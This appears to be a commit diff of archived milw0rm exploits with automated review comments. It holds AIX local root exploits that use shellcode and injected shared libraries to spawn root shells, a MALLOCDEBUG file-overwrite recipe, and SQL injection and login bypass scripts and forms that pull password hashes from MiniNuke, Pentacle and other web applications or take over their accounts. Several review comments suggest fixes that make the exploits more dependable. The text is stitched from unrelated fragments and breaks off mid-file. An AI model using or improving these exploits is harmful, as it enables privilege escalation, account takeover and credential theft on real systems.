|
||||
ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[])
|
||||
{
|
||||
ulong top, len, off;
|
||||
int i;
|
||||
|
||||
len = 0;
|
||||
for (i = 0; argv[i]; i++)
|
||||
len += strlen(argv[i]) + 1;
|
||||
for (i = 0; envp[i]; i++)
|
||||
len += strlen(envp[i]) + 1;
|
||||
top = (ulong) argv[0] + ALIGN(len, 8);
|
||||
|
||||
len = off = 0;
|
||||
for (i = 0; args[i]; i++)
|
||||
len += strlen(args[i]) + 1;
|
||||
for (i = 0; envs[i]; i++) {
|
||||
if (!strncmp(envs[i], "EGG=", 4))
|
||||
off = len + 4;
|
||||
len += strlen(envs[i]) + 1;
|
||||
}
|
||||
while (off & 3)
|
||||
strcat(envs[0], "X"), off++, len++;
|
||||
|
||||
return top - ALIGN(len, 4) + off;
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[], char *envp[])
|
||||
{
|
||||
char pad[16] = "PAD=X", egg[512], bsh[128], buf[1024];
|
||||
char *args[] = { TARGET, "/dev/null", NULL };
|
||||
char *envs[] = { pad, bsh, egg, NULL };
|
||||
int ptm, pts, pi[2];
|
||||
pid_t child;
|
||||
ulong addr;
|
||||
|
||||
sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid());
|
||||
sprintf(bsh, "SHELL=/proc/%d/object/a.out", getpid());
|
||||
addr = get_addr(argv, envp, args, envs);
|
||||
|
||||
if (!envp[0]) {
|
||||
dup2(3, 0);
|
||||
|
||||
setuid(geteuid());
|
||||
putenv("HISTFILE=/dev/null");
|
||||
execl("/bin/bash", "bash", "-i", NULL);
|
||||
execl("/bin/sh", "sh", "-i", NULL);
|
||||
perror("[-] execl");
|
||||
exit(1);
|
||||
} else if (argc && !strcmp(argv[0], "bsh")) {
|
||||
char i, ch;
|
||||
|
||||
printf("\x1b[");
|
||||
for (i = 0; i < VALCNT; i++)
|
||||
printf("%lu;", addr);
|
||||
printf("0A\n");
|
||||
fflush(stdout);
|
||||
|
||||
while (read(0, &ch, 1) == 1)
|
||||
write(1, &ch, 1);
|
||||
exit(0);
|
||||
}
|
||||
|
||||
printf("--------------------------------\n");
|
||||
printf(" AIX capture Local Root Exploit\n");
|
||||
printf(" By qaaz\n");
|
||||
printf("--------------------------------\n");
|
||||
|
||||
if (pipe(pi) < 0) {
|
||||
perror("[-] pipe");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
if ((ptm = open("/dev/ptc", O_RDWR)) < 0 ||
|
||||
(pts = open(ttyname(ptm), O_RDWR)) < 0) {
|
||||
perror("[-] pty");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
if ((child = fork()) < 0) {
|
||||
perror("[-] fork");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
if (child == 0) {
|
||||
dup2(pts, 0);
|
||||
dup2(pts, 1);
|
||||
dup2(pts, 2);
|
||||
|
||||
dup2(pi[0], 3);
|
||||
|
||||
execve(TARGET, args, envs);
|
||||
perror("[-] execve");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
close(pi[0]);
|
||||
close(pts);
|
||||
|
||||
sleep(1);
|
||||
read(ptm, buf, sizeof(buf));
|
||||
|
||||
write(ptm, " ", 1);
|
||||
shell((int[2]) { 0, pi[1] }, (int[2]) { ptm, 1 });
|
||||
kill(child, SIGTERM);
|
||||
waitpid(child, NULL, 0);
|
||||
return 0;
|
||||
}
|
||||
|
||||
// milw0rm.com [2007-07-27]
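Review bot: `kill(child, SIGTERM);` near the end of main() uses SIGTERM with no `#include <signal.h>` anywhere in the include list (`stdio.h`, `stdlib.h`, `string.h`, `fcntl.h`, `unistd.h`, `sys/wait.h`, `sys/select.h`), and `ulong`, used for `get_addr`'s return type and for `addr`, is not a standard C type; on AIX it comes from `<sys/types.h>`, which is not included either. The file only builds where another header pulls both in transitively, so add `#include <signal.h>` and `#include <sys/types.h>` next to `<sys/wait.h>`.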
@ -1,29 +1,29 @@
#!/bin/sh
#
# 07/2007: public release
# IBM AIX <= 5.3 sp6
#
echo "-------------------------------"
echo " AIX pioout Local Root Exploit "
echo " By qaaz"
echo "-------------------------------"
cat >piolib.c <<_EOF_
#include <stdlib.h>
#include <unistd.h>
void init() __attribute__ ((constructor));
void init()
{
seteuid(0);
setuid(0);
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", (void *) 0);
execl("/bin/sh", "sh", "-i", (void *) 0);
perror("execl");
exit(1);
}
_EOF_
gcc piolib.c -o piolib -shared -fPIC
[ -r piolib ] && /usr/lpd/pio/etc/pioout -R ./piolib
rm -f piolib.c piolib

# milw0rm.com [2007-07-27]
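Review bot: the heredoc `piolib.c` calls `perror("execl")` with only `<stdlib.h>` and `<unistd.h>` included, and the `gcc piolib.c -o piolib -shared -fPIC` line never checks gcc's exit status, so on a compiler that treats the implicit declaration of perror() as an error the build fails and `[ -r piolib ] && /usr/lpd/pio/etc/pioout -R ./piolib` is silently skipped with no message. Add `#include <stdio.h>` to the heredoc and chain the steps, e.g. `gcc piolib.c -o piolib -shared -fPIC && /usr/lpd/pio/etc/pioout -R ./piolib`. Separately, both sides of this 29-line hunk render as identical text, so the change here is line endings or trailing whitespace only; the commit message should say so.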
@ -1,157 +1,157 @@
/* 07/2007: public release
* IBM AIX <= 5.3 sp6
*
* AIX ftp Local Root Exploit
* By qaaz
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <unistd.h>
#include <sys/wait.h>
#include <sys/select.h>

#define TARGET "/usr/bin/ftp"
#define OVERLEN 300

#define MAX(x,y) ((x) > (y) ? (x) : (y))
#define ALIGN(x,y) (((x) + (y) - 1) / (y) * (y))

unsigned char qaazcode[] =
"\x60\x60\x60\x60\x60\x60\x60\x60"
"\x7c\x63\x1a\x79\x40\x82\xff\xfd"
"\x7e\xa8\x02\xa6\x3a\xb5\x01\x01"
"\x88\x55\xff\x5b\x3a\xd5\xff\x1b"
"\x7e\xc8\x03\xa6\x4c\xc6\x33\x42"
"\x44\xff\xff\x02\x38\x75\xff\x5f"
"\x38\x63\x01\x01\x88\x95\xff\x5d"
"\x38\x63\x01\x02\x38\x63\xfe\xff"
"\x88\xa3\xfe\xff\x7c\x04\x28\x40"
"\x40\x82\xff\xf0\x7c\xa5\x2a\x78"
"\x98\xa3\xfe\xff\x88\x55\xff\x5c"
"\x38\x75\xff\x5f\x38\x81\xff\xf8"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x4b\xff\xff\xbd\xb8\x05\x7c\xff";

void shell(int p1[2], int p2[2])
{
ssize_t n;
fd_set rset;
char buf[4096];

for (;;) {
FD_ZERO(&rset);
FD_SET(p1[0], &rset);
FD_SET(p2[0], &rset);

n = select(MAX(p1[0], p2[0]) + 1,
&rset, NULL, NULL, NULL);
if (n < 0) {
perror("[-] select");
break;
}

if (FD_ISSET(p1[0], &rset)) {
n = read(p1[0], buf, sizeof(buf));
if (n <= 0) break;
write(p1[1], buf, n);
}
if (FD_ISSET(p2[0], &rset)) {
n = read(p2[0], buf, sizeof(buf));
if (n <= 0) break;
write(p2[1], buf, n);
}
}
}

/* just because you don't understand it doesn't mean it has to be wrong */
ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[])
{
ulong top, len, off;
int i;

len = 0;
for (i = 0; argv[i]; i++)
len += strlen(argv[i]) + 1;
for (i = 0; envp[i]; i++)
len += strlen(envp[i]) + 1;
top = (ulong) argv[0] + ALIGN(len, 8);

len = off = 0;
for (i = 0; args[i]; i++)
len += strlen(args[i]) + 1;
for (i = 0; envs[i]; i++) {
if (!strncmp(envs[i], "EGG=", 4))
off = len + 4;
len += strlen(envs[i]) + 1;
}
while (off & 3)
strcat(envs[0], "X"), off++, len++;

return top - ALIGN(len, 4) + off;
}

int main(int argc, char *argv[], char *envp[])
{
char pad[16] = "PAD=X", egg[512];
char *args[] = { TARGET, NULL };
char *envs[] = { pad, egg, NULL };
int pi[2], po[2], i;
pid_t child;
ulong addr;

sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid());

if (!envp[0]) {
setuid(geteuid());
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
execl("/bin/sh", "sh", "-i", NULL);
perror("[-] execl");
exit(1);
}

printf("----------------------------\n");
printf(" AIX ftp Local Root Exploit\n");
printf(" By qaaz\n");
printf("----------------------------\n");

if (pipe(pi) < 0 || pipe(po) < 0) {
perror("[-] pipe");
exit(1);
}

addr = get_addr(argv, envp, args, envs);

if ((child = fork()) < 0) {
perror("[-] fork");
exit(1);
}

if (child == 0) {
dup2(pi[0], 0);
dup2(po[1], 1);
dup2(po[1], 2);
execve(TARGET, args, envs);
perror("[-] execve");
exit(1);
}

write(pi[1], "macdef foo\n\n$\nfoo ab", 20);
for (i = 0; i < OVERLEN; i += sizeof(addr))
write(pi[1], &addr, sizeof(addr));
write(pi[1], "\n", 1);

fflush(stdout);
fflush(stderr);

close(pi[0]);
close(po[1]);
shell((int[2]) { 0, pi[1] }, (int[2]) { po[0], 1 });
kill(child, SIGTERM);
waitpid(child, NULL, 0);
return 0;
}

// milw0rm.com [2007-07-27]
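Review bot: the width of the overflow payload depends on how this file itself is built, and the header comment does not say which way is right. `for (i = 0; i < OVERLEN; i += sizeof(addr)) write(pi[1], &addr, sizeof(addr));` emits `sizeof(ulong)` bytes per slot, while `get_addr` lays the address out for 4-byte slots (`ALIGN(len, 4)`, `while (off & 3)`), so a 64-bit build writes 8-byte values taken from its own 64-bit address space into a layout computed for a 32-bit `/usr/bin/ftp`. State in the header that it must be compiled as a 32-bit binary. The same missing `<signal.h>` (for SIGTERM) and `<sys/types.h>` (for `ulong`) includes as in the capture exploit apply here.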
@ -20,6 +20,6 @@ export PATH
/usr/sbin/invscout
PATH="/usr/bin:/usr/sbin:/usr/local/bin:/bin:./"
export PATH
exec /tmp/ksh

# milw0rm.com [2005-03-25]
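Review bot: `exec /tmp/ksh` runs whatever the preceding `/usr/sbin/invscout` step left at `/tmp/ksh` without checking that the file exists or is setuid, so on a patched system the script dies with a bare "not found", and if another user planted a `/tmp/ksh` first it execs their file instead. A guard such as `[ -u /tmp/ksh ] || { echo "no setuid /tmp/ksh, target not vulnerable"; exit 1; }` before the exec makes both outcomes explicit.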
@ -1,33 +1,33 @@
#!/bin/bash
#################################################################
# _______ _________ _ #
# ( ____ )\__ __/( ( /| #
# | ( )| ) ( | \ ( | #
# | (____)| | | | \ | | #
# | __) | | | (\ \) | #
# | (\ ( | | | | \ | #
# | ) \ \__ | | | ) \ | #
# |/ \__/ )_( |/ )_) #
# http://root-the.net #
#################################################################
#[+] IBM AIX libc MALLOCDEBUG File Overwrite Vulnerability #
#[+] Refer : securitytracker.com/id?1022261 #
#[+] Exploit : Affix <root@root-the.net> #
#[+] Tested on : IBM AIX #
#[+] Greetz : Mad-Hatter, Atomiku, RTN, Terogen, SCD, Boxhead, #
# str0ke, tekto, SonicX, Android, tw0, d0nk, Redskull #
# AIX 5.3 ML 5 is where this bad libc code was added. #
# Libs Affected : #
# /usr/ccs/lib/libc.a #
# /usr/ccs/lib/libp/libc.a #
#################################################################

Set the following environment variables:

umask 000
MALLOCTYPE=debug
MALLOCDEBUG=report_allocations,output:/bin/filename

echo "Now run any setuid root binary.. /bin/filename will be created with 777 permissions."

# milw0rm.com [2009-07-30]
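Review bot: the file opens with `#!/bin/bash` but the body is a writeup, not a script: `Set the following environment variables:` would be executed as a command, and `MALLOCTYPE=debug` / `MALLOCDEBUG=report_allocations,output:/bin/filename` are plain shell assignments without `export`, so a setuid child started afterwards would never see them and the `echo` line would promise a file that is not created. Either drop the shebang and keep it as instructions, or make it runnable with `export MALLOCTYPE=debug MALLOCDEBUG=report_allocations,output:/bin/filename` followed by an actual setuid-root invocation.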
@ -35,6 +35,6 @@ unsigned int code[]={
80010444 lwz r0,1092(SP) --jump
7c0903a6 mtspr CTR,r0
4e800420 bctr --jump
*/

# milw0rm.com [2004-09-26]
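Review bot: the `# milw0rm.com [2004-09-26]` footer on the new side of this hunk sits after the closing `*/`, outside any comment, in a C source file (the hunk context is `unsigned int code[]={`); a line starting with `#` there is an invalid preprocessing directive and the file stops compiling. Use `// milw0rm.com [2004-09-26]` as the other C files in this commit do, or move the line inside the comment. The old side also shows only `*/` and a blank line for what the header counts as three lines, so please confirm the footer is not being introduced by this change.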
@ -71,6 +71,6 @@ print "User: admin\n";
print "Pass: trapset\n\n";
print "Enjoy ;)\n";
print "\n";
### EOF ###

# milw0rm.com [2005-05-26]
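Review bot: the script ends by printing `User: admin` and `Pass: trapset` as fixed strings, i.e. the credential it tells the user to log in with is a constant that anyone reading this file also knows; take the new password from the command line instead of hard-coding it and print the value actually sent. `### EOF ###` followed by the `# milw0rm.com` footer is also two end-of-file markers; one is enough.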
@ -30,6 +30,6 @@ print "Member key: <input name=\"memKey\" type=\"text\" value=\"foo') or M_Name=
print "<input name=\"Submit\" type=\"submit\" value=\":::Change Pass:::\">";
print "</form>";
}
?>

# milw0rm.com [2005-05-26]
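Review bot: `# milw0rm.com [2005-05-26]` comes after the closing `?>`, so when this file is served by PHP the blank line and the footer are emitted into the HTML response as literal text; move the footer inside the PHP block as a `//` comment or drop the `?>`.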
@ -33,6 +33,6 @@ size="150">
<br>
<input name="Submit" type="submit" value="Submit">
</form>
-----------------End-------------------

# milw0rm.com [2005-05-26]
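Review bot: `-----------------End-------------------` and `# milw0rm.com [2005-05-26]` follow `</form>` as bare text, so a browser renders both next to the Submit button; wrap them in `<!-- ... -->`, as the crkchat file in this same commit does for its trailing note.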
@ -32,6 +32,6 @@ firstname : <input name="firstname" value="Crkchat" type="text" size="50">

<!--
-----------------------------------
Now u can use forgot password to gain passwords! -->

# milw0rm.com [2005-05-27]
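Review bot: the only instruction on what to do after submitting the form, `Now u can use forgot password to gain passwords!`, is inside the HTML comment, so someone who opens the .htm in a browser never sees it, while the `# milw0rm.com` footer, which is outside the `-->`, does render. Move that sentence above the form as visible text and put the footer inside the comment instead.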
@ -47,6 +47,6 @@ print "Wait For Changing Password ...\n";
print "[+]OK , Now Login With : \n";
print "Username: trapset\n";
print "Password: trapset\n\n";


# milw0rm.com [2005-06-27]
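Review bot: `[+]OK , Now Login With :` and the `trapset` / `trapset` credentials are printed unconditionally right after `Wait For Changing Password ...`, with no check of the server's response visible in this hunk, so a failed request still reports success. Test the response (status code or a confirmation string in the body) before printing the login line and print an error otherwise. There are also two blank lines before the footer where the other files use one.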
@ -23,6 +23,6 @@ $page=~m/the varchar value '(.*?)' to a column/ && print "[+] Username of admin
print "[-] Unable to retrieve Username\n" if(!$1);
$page=get($ARGV[0]."module/support/task/comment_post.asp?TaskID=Password") || die "[-] Unable to retrieve: $!";
$page=~m/the varchar value '(.*?)' to a column/ && print "[+] SHA256 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);

# milw0rm.com [2005-06-27]
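Review bot: `print "[-] Unable to retrieve hash of password\n" if(!$1);` cannot fire as intended: in Perl `$1` keeps the value from the last successful match, so if the second `m/the varchar value '(.*?)' to a column/` fails, `$1` still holds the username captured by the first one and the error line is skipped. Capture into a lexical and branch on it, e.g. `if (my ($hash) = $page =~ m/the varchar value '(.*?)' to a column/) { print "[+] SHA256 hash of password is: $hash\n" } else { print "[-] Unable to retrieve hash of password\n" }`, and do the same for the username check above it.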
@ -104,6 +104,6 @@ hostcustid: <input type="TEXT" name="hostcustid" ID="hostcustid" value="1"><tr>
</td>
</tr>
</table>
</form>

# milw0rm.com [2005-07-18]
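Review bot: the `hostcustid` input in the hunk context is hard-coded to `value="1"` and nothing near it says what the field selects or how to find the right id for a target, so a user has to guess; a one-line note beside the field would fix that. The `# milw0rm.com` footer after `</form>` is again bare text that a browser renders.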
@ -1,44 +1,44 @@
<!--
Save this code as .htm and replace [SITE]/[SQLCODE] to your server address

Some SQL Examples:

-Changing character data-
update character set clevel=Level,LevelUpPoint=0,Class=ClassCode,Strength=229,Dexterity=9566,Vitality=25,Energy=25,Money=52369819,Ctlcode=0,Resets=29,PkLevel=0,PkTime=0,Experience=208790999 where name='CharName';--

Classcodes arE:
0: Dark Wizard
1: Soul Master
16: Dark knight
17: Blade knight
32: Elf
33: Muse Elf
48: Magic Gladiator
64: Dark Lord

Ctlcode is admin level code:
0:Normal
1: Blocked
8: GM
16: GM LVL2

-Blasting Vault-
update warehouse set items=0xITEMCODE,money=Money where accountid='Accoutname';--

ITEMCODE is which u can get from itemproject.exe u can find it on google ;)

-Changing Account Password-
update MEMB_INFO set memb__pwd='PASSWORD' where memb___id='ACCOUNT';--
Enjoy
-->

<html>
<form action="http://[SITE]/pkok.asp" method="post">
<input type="hidden" name="username" value="notimportant">
<input type="hidden" name="userchr" value="letzinject">
<input name="pass" type="text" value="notimportant';[SQLCODE]">
<input type="submit" name="submit" value="Do IT!">
</form>
</html>

# milw0rm.com [2005-10-15]
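Review bot: the opening sentence `replace [SITE]/[SQLCODE] to your server address` is misleading: only `[SITE]` is a host, while `[SQLCODE]` in `value="notimportant';[SQLCODE]"` is one of the SQL statements listed below, each of which ends in `;--` so the remainder of the original query is commented out. Reword it to say that, and note that the `update character ... Ctlcode=0 ...` example leaves the character at Ctlcode 0 (Normal) even though the table lists 8 and 16 for GM. `Accoutname` is a typo for `Accountname`.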
@ -1,59 +1,59 @@
Contacts:{
ICQ: 10072
MSN/Email: nukedx@nukedx.com
Web: http://www.nukedx.com
}


---
Vendor: MiniNuke (www.miniex.net)
Version: 1.8.2 and prior versions must be affected.
About:Via this method remote attacker can inject SQL query to the news.asp
---
How&Example: GET -> http://[site]/news.asp?Action=Print&hid=[SQLQuery]
http://www.miniex.net/news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_id=52

Columns of MEMBERS:
uye_id = userid
sifre = md5 password hash
g_soru = secret question.
g_cevap = secret answer
email = mail address
isim = name
icq = ICQ Uin
msn = MSN Sn.
aim = AIM Sn.
meslek = job
cinsiyet = gender
yas = age
url = url
imza = signature
mail_goster = show mail :P
avurl = avatar url
avatar = avatar


---
Vendor: MiniNuke (www.miniex.net)
Version: 1.8.2 and prior versions must be affected.
About:Via this method remote attacker can change any users password without login.
---
How&Example:
HTML Example
[code]
<html>
<title>MiniNuke <= 1.8.2 remote user password change</title>
<form method="POST" action="http://[SITE]/membership.asp?action=lostpassnew">
<table border="0" cellspacing="1" cellpadding="0" align="center" width="75%">
<tr><td colspan="2" align="center"><font face=verdana size=2>Now fill in the blanks</font></td></tr>
<tr><td colspan="2" align="center"><font face=tahoma size=1red>Change password </font></td></tr>
<tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD: </font></td>
<td width="50%"><input type="text" name="pass" size="20"></td></tr>
<tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD Again : </font></td>
<td width="50%"><input type="text" name="passa" size="20"><input type="text" name="x" value="Membername">
<input type="submit" value="Send" name="B1" style="font-family: Verdana; font-size: 10px; border: 1px ridge #FFFFFF; background-color: #FFFFFF"></td></tr>
</table></form>
</html>
[/code]

# milw0rm.com [2006-01-14]
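Review bot: the second advisory claims a remote attacker can change any user's password without logging in, but the form only shows `pass`, `passa` and a text field `x` holding the member name; it should state explicitly that `membership.asp?action=lostpassnew` accepts `x` with no token or session check, since that is the whole vulnerability and a reader cannot tell it from the form alone. `<font face=tahoma size=1red>` is also a typo (`size=1` and `color=red` run together).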
@ -1,53 +1,53 @@
#!/usr/bin/perl

# MiniNuke (www.miniex.net) Version: <= 1.8.2 SQL-injection exploit.
# This exploit uses the vulnerability discovered by nukedx@nukedx.com.
# Exploit uses SQl-injection to give you the hash from user with chosen id.
# DetMyl, 2006 Detmyl@bk.ru

use IO::Socket;

if (@ARGV < 3)
{
print q(
+++++++++++++++++++++++++++++++++++++++++++++++++++
Usage: perl mini-nuke.pl [site] [dir] [useId] [proxy (optional)]
i.e. perl mini-nuke.pl "somesite.com" / 52 127.0.0.1:3128
++++++++++++++++++++++++++++++++++++++++++++++++++++
);
exit;
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$uid = $ARGV[2];
$proxy = $ARGV[3];

print "----------------------------------\n";
if ( defined $proxy) {
$proxy =~ s/(http:\/\/)//eg;
($proxyAddr,$proxyPort) = split(/:/, $proxy);
}
$serv =~ s/(http:\/\/)//eg;
$request ="http://".$serv.$dir."news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_id=".$uid;
print "Connecting to: $serv...\n";
print $proxy?"Using proxy: $proxy \n":"";
$socket = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $proxyAddr?"$proxyAddr":"$serv",
PeerPort => $proxyPort?"$proxyPort":"80")
|| die "can't connect to: $serv\n";
print $socket "GET $request HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
while($answer = <$socket>) {
if ($answer =~ /<b>([\d,a-f]{32})<\/b>/) {
print "+ Found! The hash for user $uid: $1\n";
print "----------------------------------\n";
exit(); }
if ($answer =~ /number of columns/) { print "+ Vulnerable! But no result with default querry, so manually change the scrypt;-)...\n";exit(); }
}
print "Exploit failed\n";
print "--------------------------\n";

# milw0rm.com [2006-01-14]
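Review bot: `$proxy =~ s/(http:\/\/)//eg;` and the identical line for `$serv` use the `/e` flag, which evaluates the replacement as Perl code; it only works because the replacement is empty, so drop `/e`. The hash regex `/<b>([\d,a-f]{32})<\/b>/` has a stray comma inside the character class, so it accepts commas in what should be 32 hex digits; `[\da-f]{32}` is intended. The request is also sent with bare `\n` line endings (`"GET $request HTTP/1.1\n"` and the headers after it) where HTTP requires `\r\n`, which some servers and proxies reject.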
@ -1,93 +1,93 @@
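Review bot: the scheme check near the top is inverted and inert: the `if($Server =~m/http/g)` branch runs when the argument already contains `http`, `$Server=~ 'http://$Server';` matches against a single-quoted string instead of assigning to it, the bare `print` has no argument, and the `else` branch prints `$error`, which is never set anywhere. A one-liner such as `$Server = "http://$Server" unless $Server =~ m{^http://};` would say what was meant. The same script declares `my $res` after an earlier unscoped `$res = $xpl->post(...)`, and none of the globals are declared; `use strict; use warnings;` would have flagged all of this.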
@ -1,50 +1,50 @@
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Orginal advisory: http://www.nukedx.com/?viewdoc=9
#Usage: mini.pl <victim.com> </mininuke-dir> <userid>
use IO::Socket;
if(@ARGV != 3){
print "
+**********************************************************************+
+Welcome to MiniNuke CMS System all versions (pages.asp) SQL-inject xpl+
+ Usage: mini.pl <victim> <directory> <userid> +
+ Example: mini.pl sux.com / 1 +
+ Method found & Exploit scripted by nukedx +
+**********************************************************************+
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$port = "80";
$mndir = $ARGV[1];
$victimid = $ARGV[2];
$sreq ="http://".$server.$mndir."pages.asp?id=3%20union+select+0,kul_adi,sifre,0,0+from+members+where+uye_id=".$victimid;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$mns = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $mns "GET $sreq\n";
print $mns "Host: $server\n";
print $mns "Accept: */*\n";
print $mns "Connection: close\n\n";
print "+ Connected!...\n";
while($answer = <$mns>) {
if ($answer =~ /([\d,a-f]{32})/) {
print "+ USERID: $victimid\n";
print "+ MD5 HASH: $1\n";
print "+**********************************************************************+\n";
exit(); }
if ($answer =~ /number of columns/) {
print "+ This version of Mini-Nuke is vulnerable too but default query of SQL-inject does not work on it\n";
print "+ So please edit query by manually adding null data..\n";
exit(); }
}
print "+ Exploit failed\n";
print "+**********************************************************************+\n";

# nukedx.com [2006-02-19]

# milw0rm.com [2006-02-19]

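Review bot: `$server =~ s/(http:\/\/)//eg;` applies the `e` (evaluate) flag to an empty replacement and captures a group that is never used; `s{^http://}{}` is the idiomatic, anchored form and avoids stripping a scheme that appears later in the string. The `/([\d,a-f]{32})/` match repeats the stray-comma character class from the previous script, and since it is unanchored it will accept any 32-character run of digits, commas and a-f in the page. No `use strict`/`use warnings` header, so the unquoted globals (`$server`, `$mndir`, `$victimid`, `$mns`) are never checked.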
@ -1,70 +1,70 @@
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Usage: penta.pl <victim> <directory>
#Original Advisory: http://www.nukedx.com/?viewdoc=14
use IO::Socket;
if(@ARGV < 3){
print "
+***********************************************************************+
+Pentacle In-Out Board <= 6.03 (newsdetailsview.asp) Remote SQL-Inj. XPL+
+ Usage: penta.pl <victim> <directory> <userid> +
+ Example: penta.pl sux.com / 1 +
+ Method found & Exploit scripted by nukedx +
+***********************************************************************+
";
exit();
}
#Local variables
$pentaserver = $ARGV[0];
$pentaserver =~ s/(http:\/\/)//eg;
$pentahost = "http://".$pentaserver;
$port = "80";
$pentadir = $ARGV[1];
$pentaid = $ARGV[2];
$pentatar = "newsdetailsview.asp?newsid=";
$pentafinal = "login.asp";
$pentaxp = "11%20union%20select%200,userpassword,0,username,0,0,0,0%20from%20pt_users%20where%20userid=".$pentaid."%20and%20useradmin=yes";
$pentareq = $pentahost.$pentadir.$pentatar.$pentaxp;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $pentaserver\n";
$penta = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$pentaserver", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $penta "GET $pentareq\n";
print $penta "Host: $pentaserver\n";
print $penta "Accept: */*\n";
print $penta "Connection: close\n\n";
print "+ Connected!...\n";
while($answer = <$penta>) {
if ($answer =~ /class=\"newsdetailtitle\">(.*?)<\/td>/){
print "+ Exploit succeed! Getting USERID: $pentaid admin login information.\n";
print "+ ---------------- +\n";
print "+ USERNAME: $1\n";
}
if ($answer =~ /<td align=\"right\" class=\"style9px\">(.*?) /) {
print "+ PASSWORD: $1\n";
print "+ ---------------- +\n";
print "+ Lets go $pentahost$pentadir$pentafinal and\n+ Login with this information. \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ This version of Pentacle In-Out Board is vulnerable too but default query of SQL-inject doesnt work on it\n";
print "+ So please edit query by manually adding or removing null datas..\n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /number of columns/) {
print "+ This version of Pentacle In-Out Board is vulnerable too but default query of SQL-inject doesnt work on it\n";
print "+ So please edit query by manually adding or removing null datas..\n";
print "+**********************************************************************+\n";
exit();
}
}
print "+ Try another userid maybe this one not the admin.\n";
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";

# nukedx.com [2006-02-25]

# milw0rm.com [2006-02-25]

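Review bot: the header comment `#Usage: penta.pl <victim> <directory>` documents two arguments, but the code requires three (`if(@ARGV < 3)` and `$pentaid = $ARGV[2]`) and the banner itself shows `<userid>`; bring the comment in line with the banner. `@ARGV < 3` also silently accepts surplus arguments where the sibling `mini.pl` uses `!= 3`, so the two scripts behave differently on the same mistake. The `Internal Server Error` and `number of columns` branches are verbatim copies; a single `/Internal Server Error|number of columns/` condition would keep the two messages from drifting apart.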
@ -1,36 +1,36 @@
<html>
<title>Pentacle In-Out Board <= 6.03 (login.asp) Authencation ByPass Vulnerability</title>
<script language=javascript>
function ptxpl(){
if(document.xpl.victim.value=="") {
alert("Please enter site!");
return false;
}
if(confirm("Are you sure?")) {
xpl.action="http://"+document.xpl.victim.value+"/login.asp";
xpl.username.value=document.xpl.username.value;
xpl.userpassword.value=document.xpl.userpassword.value;
xpl.submit();
}
}
</script>
<strong>
<font face="Tahoma" size="2">
Fill in the blank !:D<br>
Just enter host/path/ not http://host/path/!<br>
If Pentacle installed on / just enter host<br>
Example: host.com<br>
Example2: host.com/ptdir/<br>
<form name="xpl" method="POST" action="http://pentacle.g2soft.net/login.asp" onsubmit=ptxpl();>
Target -> <input type="text" name="victim" value="pentacle.g2soft.net" size="50">
<input type="hidden" name="username" value="any">
<input type="hidden" name="userpassword" value="' or '1'='1">
<input type="submit" value="Send">
</table></form>
</html>

Save this code as .htm and then execute.

# nukedx.com [2006-02-25]

# milw0rm.com [2006-02-25]

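Review bot: `onsubmit=ptxpl();` discards the handler's `return false`, so when the target field is empty the browser still submits the form to the hard-coded `action="http://pentacle.g2soft.net/login.asp"` after the alert; the conventional form is `onsubmit="return ptxpl();"`. The markup is also not well-formed: `<strong>` and `<font>` are never closed, `</table>` closes a table that was never opened, and the `<title>` sits outside any `<head>`. The title misspells "Authentication".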
@ -1,66 +1,66 @@
Original advisory: http://www.nukedx.com/?viewdoc=18
Advisory by: nukedx
Full PoC
Explotation:
GET -> http://[victim]/[dir]/index.asp?secao=[PageID]&id=[SQL]
EXAMPLE 1 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha+from+administradores
EXAMPLE 2 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login+from+administradores
with example 1 remote attacker can get admin's encrypted password and with example 2 remote attacker can get admin's login name
[PageID]: must be working page id you can get some from frontpage.
<--Decrypter code-->
<--Note: This decrypter just decrypts default data
If webmaster changed te_chave value in funcoes.asp
this decrypter wont decrypt data so you need to
make your own decrypter
-->
<--C Source-->
/*********************************************
* TotalECommerce PWD Decrypter *
* Coded by |SaMaN| for nukedx *
